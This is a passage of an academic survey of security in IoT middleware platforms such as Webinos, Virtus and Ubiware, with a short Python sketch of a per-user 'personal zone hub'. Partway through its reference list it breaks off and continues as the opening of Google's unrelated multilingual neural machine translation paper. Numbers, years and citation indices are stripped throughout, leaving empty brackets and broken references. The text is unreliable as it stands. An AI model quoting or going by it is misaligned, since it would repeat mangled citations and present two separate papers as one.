based on soap and the ws stack it utilizes the security models of the ws stack, in particular the ws-security standard for encryption and message integrity. there is no special support for federation, tokens or policy-based access control (instead relying on role-based access control). the resulting xml approach is very heavyweight for iot devices and costly in terms of network and power [ ]. in addition, the lack of explicit support for tokens and federated security and identity models creates a significant challenge in key distribution and centralized identity for this approach. . ubiware the ubiware project is a smart semantic middleware for ubiquitous computing [ ]. the security model for ubiware is not clearly described in the original paper, but an additional paper describes a model called smart ubiquitous resource privacy and security (surpas) [ ], which provides a security model for ubiware. ubiware is designed to utilize semantic web constructs, and surpas utilises the same model of the semantic web as the basis for the abstract and concrete security architectures that it proposes. the model is highly driven by policies and these can be stored and managed by external parties. in particular the surpas architecture is highly dynamic, allowing devices to take on board new roles or functions at runtime. while the surpas model describes a theoretical solution to the approach, there are few details on the concrete instantiation. for example, while the model defines a policy-based approach to access control, there are no clearly defined policy languages chosen. there is no clear model of identity or federation, and there is no clear guidance on how to ensure that federated policies that are stored on external servers are protected and maintain integrity. the model does not address any edge computing approaches or filtering/summarisation of iot data. however, the overall approach of using ontologies and basing policies on those ontologies is very powerful. . webinos the webinos [ ] system has a well-thought-through security architecture. the documentation explicitly discusses pbd. the webinos system is based around the core concept of devices being in the personal control of users, and therefore of each user having a “personal zone” to protect. this is a more advanced concept but in the same vein as the protected sub-domains in virtus. in the webinos model, each user has a cloud instance – known as the personal zone hub (pzh) – that supports their devices. the personal zone hub acts as a service to collect and offer access to data and capabilities of the user’s devices. the pzh acts as a certificate authority, issuing certificates to the devices that are used for mutual authentication using tls. users authenticate to the pzh using the openid protocol. on the device, a communications module known as the personal zone proxy (pzp) handles all communications with the pzh. the idea of the personal zone may have significant issues, however, when a single device is used by many different people (for example, the in-car system in a taxi as opposed to a personal vehicle). these issues are not addressed in webinos, though they are called out in the lessons learnt. webinos utilizes policy-based access control modelled in the xacml [ ] language. the system pushes xacml policies out to devices to limit the spread of personal and contextual data. webinos addresses the issue of software modification using an attestation api, which can report whether the software running is at the correct level.
this requires the device to be utilising trusted platform module (tpm) hardware that can return attestation data. webinos also addresses the issue of using secure storage on devices where the device has such storage. while the webinos project does address many of the privacy concerns of users through the use of the personal zone hub, there is clearly further work that could be done. in particular the ability for users to define what data they share with other users or other systems using a protocol such as oauth [ ], and the ability to install filters or other anonymising or data reduction aggregators into the pzh are lacking. one other aspect of webinos that is worth drawing attention to is the reliance on a certain size of device: the pzp that is needed on the device is based on the node.js framework and therefore the device needs to be of a certain size (e.g. a -bit processor running a linux derivative or similar) to participate in webinos. . virtus the virtus middleware [ ] utilizes the core security features of the xmpp protocol to ensure security. this includes tunnelling communications over tls, authentication via sasl, and access control via xmpp’s built-in mechanisms. sasl is a flexible mechanism for authentication which supports a number of different systems including token-based approaches such as oauth or kerberos, username/password, or x. certificates. for client-to-server based communications, it is not clear from the description which of these methods is actually implemented within virtus. for server-to-server communications there is specified the use of sasl to ensure full server federation. while the virtus model does not describe the challenges of implementing a personal instance of middleware for single users or devices, there is a concept of edge computing described, where some interactions may happen within an edge domain (e.g. within a house) and lower security is required within that domain while higher security is expected when sharing that data outside. this model is fairly briefly described but provides an interesting approach. one challenge is that there are multiple assumptions to this: firstly, that security within the limited domain needs less security, when there may be attackers within that perimeter. secondly, that the open channel to the wider internet cannot be misused to attack the edge network. the ability to calculate, summarise and/or filter data from the edge network before sharing it is also not discussed except in very granular terms (e.g. some data are available, other data are not). . xmpp the paper [ ] describes how the xmpp architecture can be applied to the challenges of m m and hence the iot, together with a proof-of-concept approach. the system relies on the set of xmpp extensions / around publish/subscribe and the related xmpp security models to implement security. this includes tls for encryption, and access control models around publish-subscribe. there is also a discussion about leakage of information such as presence from devices. the proof-of-concept model did not include any federated identity models, but did utilize a one-time password (otp) model on top of xmpp to address the concepts such as temporary loans of devices. summary of iot middleware security in reviewing both the security and privacy challenges of the wider iot and a structured review of more than fifty middleware platforms, we have identified some key categories that can be applied across these areas. 
firstly, we identified that a significant proportion of the systems did not address security, left it for further work, or did not describe the security approach in any meaningful detail. there were other systems (such as ubiware and naps) that offered theoretical models but did not demonstrate any real-world implementation or concrete approach. the next clear category is those middlewares that apply the soap/web services model of security. this includes socrades, sirena, and hydra/linksmart. as we have discussed in the previous sections, there are significant challenges in performance, memory footprint, processor power and usability of these approaches when used with the iot. two of the approaches delegate the model to the xmpp standards: virtus and xmpp [ , ]. xmpp also has the complexity of xml, but avoids the major performance overheads by using tls instead of xml encryption and xml security. in addition, recent work on xmpp using exi makes this approach more effective for iot. this finally leaves a few unique approaches, each of which brings its own unique benefits. drems is the only system to provide multi-level security based on the concept of security clearances. while this model is attractive to government and military circles (because of the classification systems used in those circles), we would argue that it fails in many regards for iot. in particular there are no personal controls, no concept of federated identity and no policy-based access controls in this model. smepp offers a model based on public key infrastructures and shared session keys. we would argue this approach has a number of challenges scaling to the requirements of the iot. firstly, there are significant issues in key distribution and key revocation. secondly, this model creates a new form of perimeter, based on the concept of a shared session key. that means that if one device is compromised then the data and control of all the devices in that group are also compromised. only dioptase supports the concept of stream processing in the cloud, which we argue is a serious requirement for the iot. the requirement is to be able to filter, summarise and process streams of data from devices to support anonymisation and reduction of data leakage. fiware has a powerful and extensible model for authentication and access control, including support for federated identity and policy-based access control. finally, we identified that the most advanced approach is that proposed by webinos. webinos utilizes some key technologies to provide a security and privacy model. firstly, this uses policy-based access control (xacml). the model does not however support user-guided access control mechanisms such as oauth or uma. webinos does support the use of federated identity tokens (openid), but only from users to the cloud, as opposed to devices to the cloud. we and others have proposed the model of using federated identity tokens from the device to the cloud in [ , , ]. the contribution of the webinos work with the largest potential impact is the concept of the personal zone hub, which is a cloud service dedicated to a single user to handle the security and privacy requirements of that user. there is, however, further research needed around this area: the pzh model from webinos does not examine many of the challenges of how to implement the pzh in real life. for example, user registration, cloud hosting, and many other aspects need to be defined in more detail before the webinos pzh model is practicable for real world projects. in addition, there are challenges using the pzh model with smaller devices, because of the requirement to use the pzp.
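the personal zone hub concept can be illustrated with a small sketch: a per-user service that enrols the user's devices and later verifies that a device presenting a credential really belongs to that user's zone. webinos realises this with a per-user certificate authority and tls mutual authentication; to keep the example self-contained, the sketch below substitutes hmac-signed credentials for certificates, and all names are hypothetical rather than taken from webinos.

```python
import hashlib
import hmac
import secrets


class PersonalZoneHub:
    """toy per-user hub that registers devices and issues verifiable credentials.

    webinos uses a per-user certificate authority and tls mutual authentication;
    this sketch substitutes hmac-signed credentials so it runs with only the
    standard library. it illustrates the 'personal zone' idea, not the webinos
    protocol itself.
    """

    def __init__(self, owner):
        self.owner = owner
        self._signing_key = secrets.token_bytes(32)   # secret held only by the hub
        self.devices = {}

    def register_device(self, device_id):
        """enrol a device into the owner's personal zone and hand it a credential."""
        credential = hmac.new(self._signing_key, device_id.encode(),
                              hashlib.sha256).hexdigest()
        self.devices[device_id] = credential
        return credential

    def verify(self, device_id, presented_credential):
        """check that a device presenting a credential belongs to this zone."""
        expected = self.devices.get(device_id)
        return expected is not None and hmac.compare_digest(expected, presented_credential)


if __name__ == "__main__":
    hub = PersonalZoneHub(owner="alice")
    cred = hub.register_device("alice-thermostat")
    print(hub.verify("alice-thermostat", cred))       # True: enrolled in alice's zone
    print(hub.verify("alice-thermostat", "forged"))   # False
    print(hub.verify("bob-camera", cred))              # False: never enrolled
```

even this toy version surfaces the open questions noted above: where the hub is hosted, how the owner registers, and how devices too small to run a proxy would participate.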
. overall gaps in the middleware when we look at the requirements for security and privacy of the internet of things we can see there are some gaps that are not provided by any of the reviewed middleware systems.
• only two of the middleware systems explicitly applied the concept of pbd in designing a middleware directly to support privacy, although webinos did exhibit many of the characteristics of a system that used this approach.
• only two of the systems applied any concepts of context-based security or reputation to iot devices.
• user consent was only supported in three of the systems.
• none of the systems supported anonymous identities or attestation.
• none of the systems satisfied all the requirements identified.
discussion . contributions in this paper we have taken a two-phase approach to reviewing the available literature around the security and privacy of iot devices. in the first part we created a matrix of security challenges that applied the existing cia+ model to three distinct areas: device, network and cloud. this new model forms a clear contribution to the literature. in each of the cells of the matrix we identified threats, challenges and/or approaches, or in a few cells we identified that the challenges are not exacerbated by iot concerns. we further used spiekermann and cranor’s three-layer privacy model to analyse the privacy requirements of iot. we used this analysis to identify seven major requirements and five subsidiary requirements. in the second part, we used a structured search approach to identify specific iot middleware frameworks and we analysed the security models of each of those. we utilised the twelve requirements from the first phase to validate the capabilities of each system. while there are existing surveys of iot middleware, none of them focussed on a detailed analysis of the security of the surveyed systems and therefore this forms a clear contribution to the literature. . further work in our survey, we have identified some clear gaps. over half the surveyed systems had either no security or no substantive discussion of security. out of the surveyed systems we found very few that addressed a significant proportion of the major challenges that we identified in the first section. we found certain aspects that were identified in the first section that were not addressed by any of the surveyed systems. based on this we believe there is a significant opportunity to contribute to the research by creating a middleware for iot that addresses these gaps.
• firstly, to define a model and architecture for iot middleware that is designed from the start to enable privacy and security (privacy by design).
• secondly, to bring together the best practice into a single middleware that includes: federated identity (for users and devices), policy-based access control, user-managed access to data, and stream processing in the cloud.
• thirdly, there is considerable work to be done to define a better model around the implementation challenges for the concept of a personal cloud service (e.g. the webinos pzh). this includes the hosting model, bootstrapping, discovery and usage for smaller devices.
• finally, creating a middleware system that applies context-based security and reputation to iot middleware.
references [ ] abdul-rahman, a., and hailes, s. supporting trust in virtual communities.
in hicss ’ : proceedings of the rd hawaii international conference on system sciences-volume (washington, dc, usa, ), ieee computer society. [ ] aberer, k., and hauswirth, m. middleware support for the” internet of things”. / [ ] aberer, k., and hauswirth, m. middleware support for the” internet of things”. [ ] adetoye, a. o., and badii, a. foundations and applications of security analysis. springer- verlag, berlin, heidelberg, , ch. a policy model for secure information flow, pp. – . [ ] agha, g. a. actors: a model of concurrent computation in distributed systems. tech. rep., dtic document, . [ ] agirre, a., parra, j., armentia, a., estévez, e., and marcos, m. qos aware middleware support for dynamically reconfigurable component based iot applications. international journal of distributed sensor networks ( ). [ ] alessi, m., giangreco, e., pinnella, m., pino, s., storelli, d., mainetti, l., mighali, v., and patrono, l. a web based virtual environment as a connection platform between people and iot. in computer and energy science (splitech), international multidisciplinary conference on ( ), ieee, pp. – . [ ] ali, m., nelson, j., shea, r., and freedman, m. j. blockstack: design and implementation of a global naming system with blockchains. last visited on , ( ). [ ] anand, p. enabling context-aware computing in internet of things using m m. in nanoelectronic and information systems (inis), ieee international symposium on ( ), ieee, pp. – . [ ] andersson, k., and szewczyk, p. insecurity by obscurity continues: are adsl router manuals putting end-users at risk. [ ] arcangeli, j.-p., bouzeghoub, a., camps, v., canut, m.-f., chabridon, s., conan, d., desprats, t., laborde, r., lavinal, e., leriche, s., et al. income–multi-scale context management for the internet of things. in international joint conference on ambient intelligence ( ), springer, pp. – . [ ] arduino. arduino. http://arduino.cc/, . [ ] arjunan, p., saha, m., choi, h., gulati, m., singh, a., singh, p., and srivastava, m. b. sensoract: a decentralized and scriptable middleware for smart energy buildings. in ubiquitous intelligence and computing and ieee th intl conf on autonomic and trusted computing and ieee th intl conf on scalable computing and communications and its associated workshops (uic-atc-scalcom), ieee th intl conf on ( ), ieee, pp. – . [ ] ashton, k. that ‘internet of things’ thing. rfid journal ( ), – . [ ] aspire, f. fp ict ip project advanced sensors and lightweight programmable middleware for innovative rfid enterprise applications (aspire), . [ ] atmel. master’s thesis, . [ ] atzori, l., iera, a., and morabito, g. the internet of things: a survey. computer networks , ( ), – . [ ] audet, f., and jennings, c. network address translation (nat) behavioral requirements for unicast udp. tech. rep., . [ ] augusto, a. b., and correia, m. e. an xmpp messaging infrastructure for a mobile held security identity wallet of personal and private dynamic identity attributes. proceedings of the xata ( ). [ ] augustyn, j., maślanka, p., and hamuda, g. hi-speed usb based middleware for integration of real-time systems with the cloud. international journal of distributed sensor networks ( ). [ ] aziz, b., fremantle, p., wei, r., and arenas, a. a utility-based reputation model for the internet of things. in ifip international information security and privacy conference ( ), springer, pp. – . [ ] balakrishnan, s. m., and sangaiah, a. k. mifim – middleware solution for service centric anomaly in future internet models. 
future generation computer systems ( ). [ ] ball, j. nsa stores metadata of millions of web users for up to a year, se- cret files show. http://www.theguardian.com/world/ /sep/ / nsa-americans-metadata-year-documents, . (visited on / / ). / [ ] bandyopadhyay, s., sengupta, m., maiti, s., and dutta, s. role of middleware for internet of things: a study. international journal of computer science & engineering survey (ijcses) , ( ), – . [ ] bandyopadhyay, s., sengupta, m., maiti, s., and dutta, s. a survey of middleware for internet of things. in recent trends in wireless and mobile networks. springer, , pp. – . [ ] banouar, y., reddad, s., diop, c., chassot, c., and zyane, a. monitoring solution for autonomic middleware-level qos management within iot systems. in computer systems and applications (aiccsa), ieee/acs th international conference of ( ), ieee, pp. – . [ ] baraniuk, c. ashley madison:‘suicides’ over website hack. bbc news ( ). [ ] barbon, g., margolis, m., palumbo, f., raimondi, f., and weldin, n. taking arduino to the internet of things: the asip programming model. computer communications ( ), – . [ ] benito, r. j. c., márquez, d. g., tron, p. p., castro, r. r., martín, n. s., and martín, j. l. s. smepp: a secure middleware for embedded p p. proceedings of ict-mobilesummit ( ). [ ] bernabe, j. b., hernández, j. l., moreno, m. v., and gomez, a. f. s. privacy-preserving security framework for a social-aware internet of things. in international conference on ubiquitous computing and ambient intelligence ( ), springer, pp. – . [ ] billet, b., and issarny, v. dioptase: a distributed data streaming middleware for the future web of things. journal of internet services and applications , ( ), – . [ ] binna, m. www.w .org/ /xmlsec/papers/c n performance evaluation thesis.pdf. http: //www.w .org/ /xmlsec/papers/c n \_performance\_evaluation\ _thesis.pdf, . (visited on / / ). [ ] bitcoin. system requirements. https://bitcoin.org/en/bitcoin-core/ features/requirements#system-requirements, . (accessed on / / ). [ ] bohn, h., bobek, a., and golatowski, f. sirena-service infrastructure for real-time embedded networked devices: a service oriented framework for different domains. in networking, international conference on systems and international conference on mobile communications and learning technologies, . icn/icons/mcl . international conference on ( ), ieee, pp. – . [ ] bojinov, h., michalevsky, y., nakibly, g., and boneh, d. mobile device identification via sensor fingerprinting. arxiv preprint arxiv: . ( ). [ ] botezatu, b. percent of wireless networks are highly vulnerable to hacking attacks, wi-fi security survey reveals — hotforsecurity. http://www.hotforsecurity.com/blog/ -percent-of-wireless-networks-are-highly-vulnerable-to-hacking-attacks-wi- html, . (visited on / / ). [ ] bray, t. e. a. extensible markup language (xml) . . recommendation, w c, february . available at http://www.w .org/tr/rec-xml. [ ] brickell, e., camenisch, j., and chen, l. direct anonymous attestation. in proceedings of the th acm conference on computer and communications security ( ), acm, pp. – . [ ] cam-winget, n., housley, r., wagner, d., and walker, j. security flaws in . data link protocols. communications of the acm , ( ), – . [ ] caporuscio, m., raverdy, p.-g., and issarny, v. ubisoap: a service-oriented middleware for ubiquitous networking. services computing, ieee transactions on , ( ), – . [ ] card, j. anonymity is the internet’s next big battleground. 
http://www.theguardian.com/media-network/ /jun/ / anonymity-internet-battleground-data-advertisers-marketers, . (visited on / / ). [ ] carvalho, m. a., and silva, j. n. poster: unified remoteu¡ for mobile environments. in proceedings of the st annual international conference on mobile computing and networking ( ), acm, pp. – . / [ ] cavoukian, a. privacy in the clouds. identity in the information society , ( ), – . [ ] chakravorty, r., cartwright, j., and pratt, i. practical experience with tcp over gprs. in global telecommunications conference, . globecom’ . ieee ( ), vol. , ieee, pp. – . [ ] chaqfeh, m., mohamed, n., et al. challenges in middleware solutions for the internet of things. in collaboration technologies and systems (cts), international conference on ( ), ieee, pp. – . [ ] chen, d., chang, g., sun, d., li, j., jia, j., and wang, x. trm-iot: a trust management model based on fuzzy reputation for internet of things. computer science and information systems , ( ), – . [ ] cirani, s., picone, m., gonizzi, p., veltri, l., and ferrari, g. iot-oas: an oauth-based authorization service architecture for secure services in iot scenarios. [ ] conzon, d., bolognesi, t., brizzi, p., lotito, a., tomasi, r., spirito, m., et al. the virtus middleware: an xmpp based architecture for secure iot communications. in computer communications and networks (icccn), st international conference on ( ), ieee, pp. – . [ ] conzon, d., bolognesi, t., brizzi, p., lotito, a., tomasi, r., spirito, m., et al. the virtus middleware: an xmpp based architecture for secure iot communications. in computer communications and networks (icccn), st international conference on ( ), ieee, pp. – . [ ] czauski, t., white, j., sun, y., turner, h., and eade, s. nerd – middleware for iot human machine interfaces. annals of telecommunications , - ( ), – . [ ] database, n. v. cve- - . https://web.nvd.nist.gov/view/vuln/detail? vulnid=cve- - , . (accessed on / / ). [ ] de souza, l. m. s., spiess, p., guinard, d., köhler, m., karnouskos, s., and savio, d. socrades: a web service based shop floor integration infrastructure. in the internet of things. springer, , pp. – . [ ] deitel, h. m. an introduction to operating systems, vol. . addison-wesley reading, mas- sachusetts, . [ ] desruelle, h., lyle, j., isenberg, s., and gielen, f. on the challenges of building a web- based ubiquitous application platform. in proceedings of the acm conference on ubiquitous computing ( ), acm, pp. – . [ ] dictionary, o. e. oxford english dictionary online. (accessed on / / ). [ ] dierks, t. the transport layer security (tls) protocol version . . [ ] douceur, j. r. the sybil attack. in international workshop on peer-to-peer systems ( ), springer, pp. – . [ ] dournaee, b., and dournee, b. xml security. mcgraw-hill, . [ ] duhart, c., sauvage, p., and bertelle, c. emma: a resource oriented framework for service choreography over wireless sensor and actor networks. arxiv preprint arxiv: . ( ). [ ] dunkels, a., et al. efficient application integration in ip-based sensor networks. in proceedings of the first acm workshop on embedded sensing systems for energy-efficiency in buildings ( ), acm, pp. – . [ ] eisenhauer, m., rosengren, p., and antolin, p. a development platform for integrat- ing wireless devices and sensors into ambient intelligence systems. in sensor, mesh and ad hoc communications and networks workshops, . secon workshops’ . th annual ieee communications society conference on ( ), ieee, pp. – . 
[ ] eleftherakis, g., pappas, d., lagkas, t., rousis, k., and paunovski, o. architecting the iot paradigm: a middleware for autonomous distributed sensor networks. international journal of distributed sensor networks , ( ), . / [ ] elkhodr, m., shahrestani, s., and cheung, h. a middleware for the internet of things. arxiv preprint arxiv: . ( ). [ ] et al, t. authentication and authorization for constrained environments using oauth and uma. [ ] etsi. etsi - m m. http://www.etsi.org/technologies-clusters/ technologies/m m, . (visited on / / ). [ ] evans, d. the internet of things. how the next evolution of the internet is changing everything, whitepaper, cisco internet business solutions group (ibsg) ( ). [ ] fitbit. fitbit official site for activity trackers & more. http://www.fitbit.com/, . (visited on / / ). [ ] fremantle, p. using oauth . with mqtt. http://pzf.fremantle.org/ / / using-oauth- -with-mqtt.html, . (accessed on / / ). [ ] fremantle, p., and aziz, b. oauthing: privacy-enhancing federation for the internet of things. in proceedings of the nd international conference on the cloudification of the internet of things ( ), ieee. [ ] fremantle, p., aziz, b., scott, p., and kopecký, j. federated identity and access management for the internet of things. in rd international workshop on the secure iot ( ). [ ] fremantle, p., kopecký, j., and aziz, b. web api management meets the internet of things. springer international publishing, cham, , pp. – . [ ] fronimos, t., lalis, s., koutsoubelias, m., and bartzanas, t. unified service-oriented access for wsns and dynamically deployed application tasks. in internet-of-things design and implementation (iotdi), ieee first international conference on ( ), ieee, pp. – . [ ] fullam, k., and barber, k. learning trust strategies in reputation exchange networks. in aamas ’ : proceedings of the fifth international joint conference on autonomous agents and multiagent systems ( ), acm press, pp. – . [ ] furber, s. b. arm system architecture. addison-wesley longman publishing co., inc., . [ ] garcia, f. d., de koning gans, g., muijrers, r., van rossum, p., verdult, r., schreur, r. w., and jacobs, b. dismantling mifare classic. in european symposium on research in computer security ( ), springer, pp. – . [ ] giusto, d., iera, a., morabito, g., and atzori, l. the internet of things: th tyrrhenian workshop on digital communications. springer science & business media, . [ ] gligorić, n., dejanović, i., and krčo, s. performance evaluation of compact binary xml representation for constrained devices. in distributed computing in sensor systems and workshops (dcoss), international conference on ( ), ieee, pp. – . [ ] glikson, a. fi-ware: core platform for future internet applications. in proceedings of the th annual international conference on systems and storage ( ). [ ] godik, s., anderson, a., parducci, b., humenn, p., and vajjhala, s. oasis extensible access control markup language (xacml) . tech. rep., tech. rep., oasis, . [ ] gomes, b., muniz, l., e silva, f. j. d. s., ríos, l. e. t., and endler, m. a comprehensive cloud-based iot software infrastructure for ambient assisted living. in cloud technologies and applications (cloudtech), international conference on ( ), ieee, pp. – . [ ] goodin, d. new linux worm targets routers, cameras, internet of things devices, . [ ] gudgin, m. e. a. soap version . part : messaging framework. recommendation, w c, june . available at http://www.w .org/tr/ /rec-soap -part - /. 
[ ] gura, n., patel, a., wander, a., eberle, h., and shantz, s. comparing elliptic curve cryptography and rsa on -bit cpus. in cryptographic hardware and embedded systems - ches , m. joye and j.-j. quisquater, eds., vol. of lecture notes in computer science. springer berlin heidelberg, , pp. – . [ ] hammer-lahav, d., and hardt, d. the oauth . authorization protocol. . tech. rep., ietf internet draft, . / [ ] hanks, p. collins dictionary of the english language. london: collins,— c , nd ed., edited by hanks, patrick ( ). [ ] hardjono, t., smith, n., and pentland, a. s. anonymous identities for permissioned blockchains. [ ] hasan, s., and curry, e. thingsonomy: tackling variety in internet of things events. internet computing, ieee , ( ), – . [ ] hernández, m. e. p., and reiff-marganiec, s. autonomous and self controlling smart ob- jects for the future internet. in future internet of things and cloud (ficloud), rd international conference on ( ), ieee, pp. – . [ ] hernández-ramos, j. l., jara, a. j., marin, l., and skarmeta, a. f. distributed capability-based access control for the internet of things. journal of internet services and information security (jisis) , / ( ), – . [ ] hill, k. when ’smart homes’ get hacked: i haunted a complete stranger’s house via the internet - forbes. http://www.forbes.com/sites/kashmirhill/ / / / smart-homes-hack/, . (visited on / / ). [ ] iivari, a., väisänen, t., ben alaya, m., riipinen, t., and monteil, t. harnessing xmpp for machine-to-machine communications & pervasive applications. journal of communications software & systems , ( ). [ ] initiative, k., et al. user managed access (uma), . [ ] ji, z., ganchev, i., o’droma, m., zhao, l., and zhang, x. a cloud-based car parking middleware for iot-based smart cities: design and implementation. sensors , ( ), – . [ ] jØsang, a., ismail, r., and boyd, c. a survey of trust and reputation systems for online service provision. decision support systems , (march ), – . [ ] keoh, s., kumar, s., and garcia-morchon, o. securing the ip-based internet of things with dtls. working draft, february ( ). [ ] khurana, h., hadley, m., lu, n., and frincke, d. a. smart-grid security issues. security & privacy, ieee , ( ), – . [ ] kliem, a. cooperative device cloud. [ ] koblitz, n. elliptic curve cryptosystems. mathematics of computation , ( ), – . [ ] koschuch, m., hudler, m., and krüger, m. performance evaluation of the tls handshake in the context of embedded devices. in data communication networking (dcnet), proceedings of the international conference on ( ), ieee, pp. – . [ ] lan, l., wang, b., zhang, l., shi, r., and li, f. an event-driven service-oriented architecture for internet of things service execution. international journal of online engineering (ijoe) , ( ), pp– . [ ] landman, d. davylandman/aeslib. https://github.com/davylandman/aeslib, . (visited on / / ). [ ] larson, j., perlroth, n., and shane, s. the nsa’s secret campaign to crack, un- dermine internet encryption - propublica. http://www.propublica.org/article/ the-nsas-secret-campaign-to-crack-undermine-internet-encryption, . (visited on / / ). [ ] le vinh, t., bouzefrane, s., farinone, j.-m., attar, a., and kennedy, b. p. middleware to integrate mobile devices, sensors and cloud computing. procedia computer science ( ), – . [ ] levä, t., mazhelis, o., and suomi, h. comparing the cost-efficiency of coap and http in web of things applications. decision support systems ( ), – . / [ ] levendovszky, t., dubey, a., otte, w. 
r., balasubramanian, d., coglio, a., nyako, s., emfinger, w., kumar, p., gokhale, a., and karsai, g. distributed real-time managed systems: a model-driven distributed secure information architecture platform for managed embedded systems. software, ieee , ( ), – . [ ] levinson, l. secrets, lies and snowden’s email: why i was forced to shut down lavabit. http://www.theguardian.com/commentisfree/ /may/ / why-did-lavabit-shut-down-snowden-email, . (visited on / / ). [ ] lim, l., marie, p., conan, d., chabridon, s., desprats, t., and manzoor, a. enhancing context data distribution for the internet of things using qoc-awareness and attribute-based access control. annals of telecommunications , - ( ), – . [ ] linksmart. eulinksmartsecuritycommunicationsecuritymanagersym - links- mart open source middleware - linksmart middleware portal. https:// linksmart.eu/redmine/projects/linksmart-opensource/wiki/ eulinksmartsecuritycommunicationsecuritymanagersym, . (visited on / / ). [ ] linksmart.eu. linksmart middleware portal. https://linksmart.eu/redmine, . (visited on / / ). [ ] liu, c. h., yang, b., and liu, t. efficient naming, addressing and profile services in internet- of-things sensory environments. ad hoc networks ( ), – . [ ] locke, d. mq telemetry transport (mqtt) v . protocol specification. ibm developerworks technical library], available at http://www. ibm. com/developerworks/webservices/library/ws- mqtt/index. html ( ). [ ] lomne, v., dehaboui, a., maurine, p., torres, l., and robert, m. side channel attacks. in security trends for fpgas. springer, , pp. – . [ ] luckenbach, t., gober, p., arbanowski, s., kotsopoulos, a., and kim, k. tinyrest-a protocol for integrating sensor networks into the internet. in proc. of realwsn ( ), pp. – . [ ] mahalle, p. n., anggorojati, b., prasad, n. r., and prasad, r. identity establishment and capability based access control (iecac) scheme for internet of things. in wireless personal multimedia communications (wpmc), th international symposium on ( ), ieee, pp. – . [ ] mcdaniel, p., and mclaughlin, s. security and privacy challenges in the smart grid. security & privacy, ieee , ( ), – . [ ] mhlaba, a., and masinde, m. implementation of middleware for internet of things in asset tracking applications: in-lining approach. in industrial informatics (indin), ieee th international conference on ( ), ieee, pp. – . [ ] michiardi, p., and molva, r. core: a collaborative reputation mechanism to enforce node cooperation in mobile ad hoc networks. in advanced communications and multimedia security. springer, , pp. – . [ ] miller, v. s. use of elliptic curves in cryptography. in advances in cryptology—crypto’ proceedings ( ), springer, pp. – . [ ] montanari, r., toninelli, a., and bradshaw, j. m. context-based security management for multi-agent systems. in multi-agent security and survivability, ieee nd symposium on ( ), ieee, pp. – . [ ] morris, t. trusted platform module., . [ ] moskowitz, r. hip diet exchange (dex). [ ] moskowitz, r. host identity protocol architecture. [ ] mpitziopoulos, a., gavalas, d., konstantopoulos, c., and pantziou, g. a survey on jamming attacks and countermeasures in wsns. ieee communications surveys & tutorials , ( ). / [ ] murphy, c. internet of things: who gets the data? - informationweek. http://www.informationweek.com/ strategic-cio/executive-insights-and-innovation/ internet-of-things-who-gets-the-data/a/d-id/ , . (visited on / / ). [ ] nakamoto, s. bitcoin: a peer-to-peer electronic cash system. [ ] narayanan, a., and shmatikov, v. 
google's multilingual neural machine translation system: enabling zero-shot translation melvin johnson∗, mike schuster∗, quoc v. le, maxim krikun, yonghui wu, zhifeng chen, nikhil thorat, fernanda viégas, martin wattenberg, greg corrado, macduff hughes, jeffrey dean google {melvinp,schuster}@google.com abstract we propose a simple solution to use a single neural machine translation (nmt) model to translate between multiple languages. our solution requires no changes to the model architecture from a standard nmt system but instead introduces an artificial token at the beginning of the input sentence to specify the required target language. using a shared wordpiece vocabulary, our approach enables multilingual nmt systems using a single model. on the wmt' benchmarks, a single multilingual model achieves comparable performance for english→french and surpasses state-of-the-art results for english→german. similarly, a single multilingual model surpasses state-of-the-art results for french→english and german→english on wmt' and wmt' benchmarks, respectively.
on production corpora, multilingual models of up to twelve language pairs allow for better translation of many individual pairs. our models can also learn to perform implicit bridging between language pairs never seen explicitly during training, showing that transfer learning and zero-shot translation is possible for neural translation. finally, we show analyses that hint at a universal interlingua representation in our models and also show some interesting examples when mixing languages. introduction end-to-end neural machine translation (nmt) (sutskever et al., ; bahdanau et al., ; cho et al., ) is an approach to machine translation that has rapidly gained adoption in many large-scale settings (zhou et al., ; wu et al., ; crego and et al., ). almost all such systems are built for a single language pair — so far there has not been a sufficiently simple and efficient way to handle multiple language pairs using a single model without making significant changes to the basic nmt architecture. in this paper we introduce a simple method to translate between multiple languages using a single model, taking advantage of multilingual data to improve nmt for all languages involved. our method requires no change to the traditional nmt model architecture. instead, we add an artificial token to the input sequence to indicate the required target language, a simple amendment to the data only. all other parts of the system — encoder, decoder, attention, and shared wordpiece vocabulary as described in wu et al., ( ) — stay exactly the same. this method has several attractive benefits: • simplicity: since no changes are made to the architecture of the model, scaling to more languages is trivial — any new data is simply added, possibly with over- or under-sampling such that all languages are appropriately represented, and used with a new token if the target language changes. since no changes are made to the training procedure, the mini-batches for training are just sampled from the overall mixed-language training data just like for the single-language case. since no a-priori decisions about how to allocate parameters for different languages are made, the system adapts automatically to use the total number of parameters efficiently to minimize the global loss. a multilingual model architecture of this type also simplifies production deployment significantly since it can cut down the total number of models necessary when dealing with multiple languages. note that at google, we support a total of over languages as source and target, so theoretically models would be necessary for the best possible translations between all pairs, if each model could only support a single language pair. clearly this would be problematic in a production environment. even when limiting to translating to/from english only, we still need over models. finally, batching together many requests from potentially different source and target languages can significantly improve efficiency of the serving system. in comparison, an alternative system that requires language-dependent encoders, decoders or attention modules does not have any of the above advantages.
• low-resource language improvements: in a multilingual nmt model, all parameters are implicitly shared by all the language pairs being modeled. this forces the model to generalize across language boundaries during training. it is observed that when language pairs with little available data and language pairs with abundant data are mixed into a single model, translation quality on the low resource language pair is significantly improved. • zero-shot translation: a surprising benefit of modeling several language pairs in a single model is that the model can learn to translate between language pairs it has never seen in this combination during training (zero-shot transla- tion) — a working example of transfer learn- ing within neural translation models. for ex- ample, a multilingual nmt model trained with portuguese→english and english→spanish ex- amples can generate reasonable translations for portuguese→spanish although it has not seen any data for that language pair. we show that the quality of zero-shot language pairs can easily be improved with little additional data of the lan- guage pair in question (a fact that has been pre- viously confirmed for a related approach which is discussed in more detail in the next section). in the remaining sections of this paper we first discuss related work and explain our multilingual system architecture in more detail. then, we go through the different ways of merging languages on the source and target side in increasing diffi- culty (many-to-one, one-to-many, many-to-many), and discuss the results of a number of experiments on wmt benchmarks, as well as on some of google’s large-scale production datasets. we present results from transfer learning experiments and show how implicitly-learned bridging (zero-shot translation) performs in comparison to explicit bridging (i.e., first translating to a common language like english and then translating from that common language into the desired target language) as typically used in machine translation systems. we describe visualizations of the new system in action, which provide early evidence of shared semantic representations (interlingua) be- tween languages. finally we also show some interest- ing applications of mixing languages with examples: code-switching on the source side and weighted tar- get language mixing, and suggest possible avenues for further exploration. related work interlingual translation is a classic method in machine translation (richens, ; hutchins and somers, ). despite its distinguished history, most practi- cal applications of machine translation have focused on individual language pairs because it was simply too difficult to build a single system that translates reliably 